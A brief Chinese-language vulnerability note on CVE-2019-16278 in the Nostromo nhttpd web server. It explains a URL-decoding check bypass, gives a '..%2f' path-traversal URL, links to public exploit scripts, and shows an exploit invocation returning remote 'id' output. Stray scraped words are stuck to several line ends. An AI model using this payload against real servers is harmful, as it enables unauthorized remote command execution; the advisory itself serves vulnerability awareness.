Nostromo web server(nhttpd)是一個開源的web服務器,在Unix系統很是流行。html
漏洞緣由是web服務在對URL進行檢查是在URL被解碼前,攻擊者能夠將/
轉換爲%2f
就可繞過檢查,以前出現過相似漏洞CVE-2011-0751,POC以下:git
http://www.example.org/..%2flogs/access_log
利用前提github
Nostromo version <= 1.9.6web
Python POC:https://github.com/sudohyak/exploit/blob/master/CVE-2019-16278/exploit.py服務器
mark@mark-Pc:~/nhttpd-exploits$ ./CVE-2019-16278.sh 127.0.0.1 80 id uid=1000(mark) gid=1000(mark) groups=1000(mark),0(root)
EXP: https://git.sp0re.sh/sp0re/Nhttpd-exploitsui
參考code
https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html?utm_source=webcode.ca&utm_medium=web&utm_campaign=twitter
https://nosec.org/home/detail/3074.htmlserver